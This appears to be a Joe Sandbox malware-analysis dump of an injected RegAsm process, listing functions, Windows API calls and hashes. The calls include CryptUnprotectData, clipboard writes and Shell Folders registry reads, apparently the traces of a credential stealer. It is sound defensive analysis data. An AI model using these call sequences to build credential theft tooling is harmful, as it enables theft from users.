Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: File$PointerRead
String ID:
API String ID: 3154509469-0
Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25

Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588

Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: PrivateProfile$StringWrite_itowmemset
String ID:
API String ID: 4232544981-0
Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59

Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54

Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305

Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55

Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,00000009,?,00000000,00000000), ref: 0040A325

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94

Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC

Function 0040B633 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040B63A

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 6cac8f1a699deb91221d7a6f108e22352180a1071cf07404188a59dfc78ebdbf
Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
Opcode Fuzzy Hash: 6cac8f1a699deb91221d7a6f108e22352180a1071cf07404188a59dfc78ebdbf
Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D

Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524

Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524

Function 0040AA04 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040AA0B

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 9f3c014d0cf6ef3ef7071a5cb6dd1d5584685ccd4eb021183226fc9c7d12a071
Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
Opcode Fuzzy Hash: 9f3c014d0cf6ef3ef7071a5cb6dd1d5584685ccd4eb021183226fc9c7d12a071
Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18

Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040B052

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518

Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28

Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: EnumNamesResource
String ID:
API String ID: 3334572018-0
Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A

Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0044DEB6

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D

Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04

Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17

Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00

Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA

Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004095FC

Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55

Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C

Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
String ID:
API String ID: 3655998216-0
Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659

Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00445426

Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55

Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C

Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
String ID:
API String ID: 1828521557-0
Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9

Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8

Part of subcall function 004062A6: SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2

memcpy.MSVCRT ref: 00406942

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ??2@FilePointermemcpy
String ID:
API String ID: 609303285-0
Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9

Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 00406BC1

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: _wcsicmp
String ID:
API String ID: 2081463915-0
Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68

Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C

Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5

GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281

Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastRead
String ID:
API String ID: 2136311172-0
Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E

Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052

??2@YAPAXI@Z.MSVCRT ref: 0040AFD8

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ??2@??3@
String ID:
API String ID: 1936579350-0
Opcode ID: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
Opcode Fuzzy Hash: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8

Non-executed Functions

Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON

Download Yara Rule

APIs

EmptyClipboard.USER32 ref: 00409882
wcslen.MSVCRT ref: 0040988F
GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
GlobalFix.KERNEL32(00000000), ref: 004098AC
memcpy.MSVCRT ref: 004098B5
GlobalUnWire.KERNEL32(00000000), ref: 004098BE
SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
CloseClipboard.USER32 ref: 004098D7

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
String ID:
API String ID: 2014503067-0
Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779

Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 004182D7

Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE

FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
LocalFree.KERNEL32(?), ref: 00418342
??3@YAXPAX@Z.MSVCRT ref: 00418370

Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
Part of subcall function 00417434: malloc.MSVCRT ref: 00417459

Strings

OsError 0x%x (%u), xrefs: 00418354

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
String ID: OsError 0x%x (%u)
API String ID: 403622227-2664311388
Opcode ID: 63f4947bb6e883e354d3d2ebf96ad5df6c46b6e8727c7c07250c00721f9c325d
Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
Opcode Fuzzy Hash: 63f4947bb6e883e354d3d2ebf96ad5df6c46b6e8727c7c07250c00721f9c325d
Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9

Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 004173BE

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A

Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 004022A6
_wcsicmp.MSVCRT ref: 004022D7
_wcsicmp.MSVCRT ref: 00402305
_wcsicmp.MSVCRT ref: 00402333

Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B

memset.MSVCRT ref: 0040265F
memcpy.MSVCRT ref: 0040269B

Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498

memcpy.MSVCRT ref: 004026FF
